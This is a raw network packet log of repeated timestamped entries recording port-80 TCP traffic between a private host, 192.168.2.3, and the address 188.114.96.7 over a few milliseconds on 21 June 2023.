Jun 21, 2023 04:27:44.901603937 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.901653051 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.901654005 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901702881 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901746035 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901787043 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.901803970 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901856899 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901868105 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.901926041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.901978970 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902030945 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902041912 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.902081966 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902132988 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902142048 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.902188063 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902208090 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.902236938 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902293921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902302980 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.902343035 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902393103 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902437925 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902473927 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.902494907 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902543068 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902576923 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.902600050 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902630091 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.902656078 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902704954 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902719975 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.902760983 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902817011 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.902818918 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902865887 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902910948 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902954102 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.902997971 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.903018951 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.903019905 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903069973 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903134108 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903179884 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.903191090 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903238058 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903306007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903342962 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.903373957 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903439999 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903512001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903521061 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.903521061 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.903584003 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903654099 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903717041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903781891 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.903785944 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903781891 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.903831959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903881073 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903923988 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.903934956 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903989077 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.903996944 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.904037952 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.904083014 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.904134989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.904145002 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.904196978 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.904263020 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.904295921 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.904351950 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.904402018 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.904407978 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.904459000 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.904480934 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.904510975 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.904562950 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.904573917 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.904617071 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.904661894 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.904711008 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.904728889 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.904761076 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.904812098 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.904820919 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.904879093 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.904887915 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.904943943 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905006886 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905071974 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905092955 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.905129910 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.905131102 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905179977 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905230999 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905240059 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.905282974 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905337095 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905344009 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.905389071 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905436993 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905455112 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.905491114 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905535936 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905586004 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905596018 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.905637980 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905689955 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905703068 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.905755997 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905766010 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.905805111 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905854940 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905872107 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.905905962 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.905951023 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906002045 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906012058 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.906053066 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906101942 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906147003 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906192064 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906225920 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.906246901 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.906259060 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906325102 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906392097 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906411886 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.906457901 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906526089 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906528950 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.906586885 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906636953 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906666994 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.906683922 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.906697035 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906753063 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906757116 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.906801939 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906843901 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906887054 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906929970 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.906969070 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.906986952 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907052994 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907118082 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907119989 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.907185078 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907248020 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.907248020 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907315969 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907318115 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.907383919 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907449961 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907474041 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.907512903 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907561064 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907613039 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907622099 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.907665014 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907716990 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907726049 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.907772064 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907779932 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.907820940 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907871962 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907881021 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.907922983 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907975912 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.907984972 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.908025980 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908071041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908127069 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908133030 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.908190966 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908257961 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908276081 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.908354998 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.908355951 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908421993 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908483982 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.908487082 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908535004 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908586979 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908597946 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.908638954 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908684015 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908735037 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908742905 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.908786058 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908838034 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908843994 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.908891916 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908899069 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.908946991 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.908998013 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909006119 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.909054041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909120083 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909132957 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.909184933 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909240961 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909288883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909298897 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.909339905 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909379959 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.909398079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909447908 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909461021 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.909499884 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909555912 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909555912 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.909604073 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909655094 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909662962 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.909704924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909750938 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909802914 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909812927 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.909852982 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909904957 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909910917 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.909959078 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.909972906 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.910011053 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910063028 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910070896 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.910111904 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910166025 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910177946 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.910217047 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910262108 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910312891 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910324097 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.910366058 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910414934 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910430908 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.910470009 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.910474062 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910518885 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910571098 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910587072 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.910621881 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910674095 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910681963 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.910722017 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910768032 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910815954 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910837889 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.910868883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910919905 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910933018 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.910979033 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.910981894 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.911029100 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911082029 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911084890 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.911129951 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911180019 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911192894 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.911236048 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911243916 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.911286116 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911338091 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911349058 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.911391020 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911443949 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911447048 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.911497116 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911515951 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.911549091 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911598921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911607981 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.911650896 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911704063 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911709070 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.911756039 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911767006 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.911808014 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911860943 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911866903 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.911911964 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911966085 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.911971092 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.912020922 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912026882 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.912070990 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912123919 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912127972 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.912168026 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.912185907 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912189007 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.912236929 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912311077 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.912326097 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912374973 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912422895 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912436962 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.912478924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912488937 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.912529945 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912580967 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912580967 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.912638903 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.912655115 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912657976 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.912702084 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912751913 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912765026 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.912803888 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912857056 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912863016 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.912914991 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.912916899 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.912967920 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.913021088 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.913028002 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.913072109 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.913122892 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.913129091 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.913176060 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.913191080 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.913228035 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.913279057 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.913285971 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.913330078 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.913368940 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.913393974 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.913394928 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.913482904 CEST	49709	80	192.168.2.3	188.114.96.7
